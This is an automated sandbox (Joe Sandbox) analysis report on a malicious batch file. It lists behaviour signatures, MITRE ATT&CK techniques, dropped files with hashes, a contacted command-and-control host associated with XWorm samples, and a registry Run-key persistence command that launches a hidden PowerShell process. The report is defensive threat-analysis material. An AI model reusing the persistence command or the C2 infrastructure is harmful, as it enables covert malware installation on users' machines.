Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\$cnt-sYvLLQ2I VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\$cnt-sYvLLQ2I VolumeInformation

Source: C:\Windows\System32\dllhost.exe

Code function: 37_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

37_2_0000000140002300

Source: C:\Windows\System32\cmd.exe

Code function: 21_2_000001F1197D8090 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

21_2_000001F1197D8090

Source: dllhost.exe, svchost.exe, 00000031.00000003.1871573480.000002A76AE6F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.1825139407.000002A76AE6F000.00000004.00000001.00020000.00000000.sdmp

Binary or memory string: MsMpEng.exe

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	12 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	11 Input Capture	1 System Time Discovery	Remote Services	1 Archive Collected Data	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	12 Native API	1 DLL Side-Loading	1 Access Token Manipulation	1 Obfuscated Files or Information	LSASS Memory	2 File and Directory Discovery	Remote Desktop Protocol	11 Input Capture	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	222 Command and Scripting Interpreter	11 Scheduled Task/Job	713 Process Injection	1 Software Packing	Security Account Manager	132 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	11 Scheduled Task/Job	21 Registry Run Keys / Startup Folder	11 Scheduled Task/Job	1 DLL Side-Loading	NTDS	261 Security Software Discovery	Distributed Component Object Model	Input Capture	1 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 PowerShell	Network Logon Script	21 Registry Run Keys / Startup Folder	11 File Deletion	LSA Secrets	2 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Masquerading	Cached Domain Credentials	141 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Modify Registry	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	141 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Access Token Manipulation	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	713 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Hidden Files and Directories	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Q5N7WOpk8J.bat	5%	ReversingLabs

Source	Detection	Scanner	Label
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://aka.ms/pscore6lB	0%	URL Reputation	safe
http://schemas.xmlsoap.org/wsdl/	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
https://aka.ms/pscore68	0%	URL Reputation	safe
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/wsdl/erties	0%	Avira URL Cloud	safe
http://www.microsoft.co	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2005/02/trust	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2004/09/policy	0%	Avira URL Cloud	safe
https://github.com/Pester/Pester	0%	Avira URL Cloud	safe
http://www.apache.org/licenses/LICENSE-2.0.html	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2005/07/securitypolicy	0%	Avira URL Cloud	safe
http://osoft.co_2010-06X	0%	Avira URL Cloud	safe
https://aka.ms/pscore6	0%	Avira URL Cloud	safe
https://aka.ms/pscore6xG	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/wsdl/soap12/	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/wsdl/soap12/P	0%	Avira URL Cloud	safe
http://docs.oasis-open.org/ws-sx/ws-trust/200512	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
fixed-noon.gl.at.ply.gg	147.185.221.21	true	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000022.00000002.1782893457.0000022553460000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1782893457.0000022553606000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702	lsass.exe, 00000027.00000002.2551990722.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1746269910.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000022.00000002.1740710530.000002254361C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/09/policy	lsass.exe, 00000027.00000002.2551990722.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1746269910.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/wsdl/erties	lsass.exe, 00000027.00000002.2551990722.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1746269910.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000022.00000002.1740710530.000002254361C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://go.micro	powershell.exe, 0000001F.00000002.1721914542.0000000004B7E000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1740710530.0000022544537000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.microsoft.co	powershell.exe, 0000001C.00000002.2582592415.0000022F1DD57000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 00000022.00000002.1782893457.0000022553460000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000022.00000002.1782893457.0000022553460000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://osoft.co_2010-06X	dwm.exe, 00000029.00000000.1764744714.00000262ED790000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 00000029.00000002.2625112996.00000262ED790000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore6	powershell.exe, 0000001C.00000002.2585583719.0000022F1E171000.00000004.00000001.00020000.00000000.sdmp, Null.14.dr	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust	lsass.exe, 00000027.00000002.2551990722.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1746269910.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000022.00000002.1740710530.000002254361C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/07/securitypolicy	lsass.exe, 00000027.00000002.2551990722.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.2553174289.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1746323594.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1746269910.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/wsdl/soap12/	lsass.exe, 00000027.00000002.2551990722.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1746269910.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore6lB	powershell.exe, 0000001F.00000002.1721914542.00000000048C1000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/wsdl/	lsass.exe, 00000027.00000002.2551990722.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1746269910.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/	powershell.exe, 00000022.00000002.1782893457.0000022553460000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000022.00000002.1782893457.0000022553460000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://aka.ms/pscore6xG	powershell.exe, 0000001C.00000002.2585583719.0000022F1E171000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/wsdl/soap12/P	lsass.exe, 00000027.00000002.2551990722.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1746269910.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore68	powershell.exe, 0000001C.00000002.2585583719.0000022F1E171000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1740710530.00000225433F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/ws-sx/ws-trust/200512	lsass.exe, 00000027.00000002.2553174289.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1746323594.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd	lsass.exe, 00000027.00000002.2551990722.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1746269910.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 0000001C.00000002.2585583719.0000022F1E171000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1721914542.00000000048C1000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1740710530.00000225433F1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
147.185.221.21	fixed-noon.gl.at.ply.gg	United States		12087	SALSGIVERUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1519360
Start date and time:	2024-09-26 12:19:13 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 57s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	20
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	Q5N7WOpk8J.bat renamed because original name is a hash value
Original Sample Name:	5c6dbf4219fd4e2251de392eb2544581.bat
Detection:	MAL
Classification:	mal100.spyw.evad.winBAT@51/21@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 68 Number of non-executed functions: 315
Cookbook Comments:	Found application associated with file extension: .bat

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe, SgrmBroker.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.190.159.23, 40.126.31.67, 20.190.159.71, 20.190.159.4, 20.190.159.2, 40.126.31.69, 20.190.159.75, 40.126.31.71, 20.189.173.21
Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, slscr.update.microsoft.com, login.live.com, www.tm.v4.a.prd.aadg.akadns.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtFsControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtSetInformationFile calls found.
VT rate limit hit for: Q5N7WOpk8J.bat

Simulations

Behavior and APIs

Time	Type	Description
06:20:08	API Interceptor	4x Sleep call for process: WMIC.exe modified
06:20:13	API Interceptor	85795x Sleep call for process: powershell.exe modified
07:23:18	API Interceptor	85256x Sleep call for process: winlogon.exe modified
07:23:20	API Interceptor	73552x Sleep call for process: dwm.exe modified
07:23:20	API Interceptor	54222x Sleep call for process: lsass.exe modified
07:23:21	API Interceptor	7128x Sleep call for process: svchost.exe modified
07:23:35	API Interceptor	209x Sleep call for process: cmd.exe modified
07:23:35	API Interceptor	212x Sleep call for process: conhost.exe modified
07:23:42	API Interceptor	90x Sleep call for process: dllhost.exe modified
13:22:59	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Windows_Log cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$cnt-onimai2\$cnt-CO2.bat' -WindowStyle Hidden \| powershell.exe -WindowStyle Hidden
13:23:07	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Windows_Log cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$cnt-onimai2\$cnt-CO2.bat' -WindowStyle Hidden \| powershell.exe -WindowStyle Hidden

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
147.185.221.21	NzEsfIiAc0.exe	Get hash	malicious	XWorm	Browse
	Y666Gn09a1.exe	Get hash	malicious	XWorm	Browse
	Uhj9qfwbYG.exe	Get hash	malicious	AsyncRAT, XWorm	Browse
	WIN CHANGER 2.3.exe	Get hash	malicious	XWorm	Browse
	jj7svxNeaQ.exe	Get hash	malicious	XWorm	Browse
	PCCooker2.0_x64.exe	Get hash	malicious	AsyncRAT, DCRat, GuLoader, Lokibot, Njrat, PureLog Stealer, SilverRat	Browse
	JFhDGHXmW6.exe	Get hash	malicious	Unknown	Browse
	N7bEDDO8u6.exe	Get hash	malicious	Blank Grabber, DCRat, Njrat, Umbral Stealer, XWorm	Browse
	N7bEDDO8u6.exe	Get hash	malicious	Blank Grabber, DCRat, Njrat, Umbral Stealer, XWorm	Browse
	SenditIllrunitinmyvirtualmachineinsidemyvirtualmachine.bat	Get hash	malicious	Unknown	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SALSGIVERUS	SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Get hash	malicious	XWorm	Browse	147.185.221.22
	3EtS1ncqvJ.exe	Get hash	malicious	Njrat	Browse	147.185.221.19
	hfKx2T5IfT.exe	Get hash	malicious	Njrat	Browse	147.185.221.19
	BANK PAYMENT COPY.doc	Get hash	malicious	XWorm	Browse	147.185.221.22
	It8DXmSFEk.exe	Get hash	malicious	Njrat	Browse	147.185.221.19
	6Mt223MA25.exe	Get hash	malicious	ArrowRAT	Browse	147.185.221.18
	IWsK3V2Ul9.exe	Get hash	malicious	ArrowRAT	Browse	147.185.221.17
	SecuriteInfo.com.FileRepMalware.32767.25187.exe	Get hash	malicious	Unknown	Browse	147.185.221.20
	SecuriteInfo.com.Trojan.Siggen29.35475.19245.6407.exe	Get hash	malicious	SheetRat	Browse	147.185.221.17
	jQ2ryeS5ZP.exe	Get hash	malicious	PureCrypter, Revenge, CyberGate, DCRat, GuLoader, Njrat, PureLog Stealer	Browse	147.185.221.22

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	9713
Entropy (8bit):	4.940954773740904
Encrypted:	false
SSDEEP:	192:6xoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smu9:9rib4ZIkjh4iUxsNYW6Ypib47
MD5:	BA7C69EBE30EC7DA697D2772E36A746D
SHA1:	DA93AC7ADC6DE8CFFED4178E1F98F0D0590EA359
SHA-256:	CFCE399DF5BE3266219AA12FB6890C6EEFDA46D6279A0DD90E82A970149C5639
SHA-512:	E0AFE4DF389A060EFDACF5E78BA6419CECDFC674AA5F201C458D517C20CB50B70CD8A4EB23B18C0645BDC7E9F326CCC668E8BADE803DED41FCDA2AE1650B31E8
Malicious:	false
Preview:	PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2916
Entropy (8bit):	5.383067491382605
Encrypted:	false
SSDEEP:	48:4KAAzsSU4y4RQmFoUL5a+m9qr9t5/78NfpH4GxJaGaxIZVEouNHJBVrH/jCB:MAzlHyIFKEg9qrh7KfpRJlPEo2dL8
MD5:	CE4F67AB438CDEF15E3BD3CE128F7B38
SHA1:	8B86E68E73D6ECD678C1E4CC49E863C9D1A307DC
SHA-256:	CFF3A5491628B5ADC8D112521892A222CFE27303E63990B9DFA72A7C6785A781
SHA-512:	0DEDEA7D9CE75EACD04911A94ACA309B13DF891DFA6C58933192A54F091E23591256823B4D685A107A983EFB46C2AA189EB18BA4BCDCCBEFDD5DBD75D80E6F93
Malicious:	false
Preview:	@...e...........................................................H..............@-....f.J.\|.7h8..-.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.<...............i..VdqF...\|...........System.Configuration4.................0..~.J.R...L........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.8.................C}...C....n..Bi.......Microsoft.CSharpP...............

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0sm0liga.nc4.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5xkid3nn.3jg.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aiob2gei.nay.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lxaazhmj.shy.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_npqarj1o.z2h.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rg5ajs0f.ihs.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
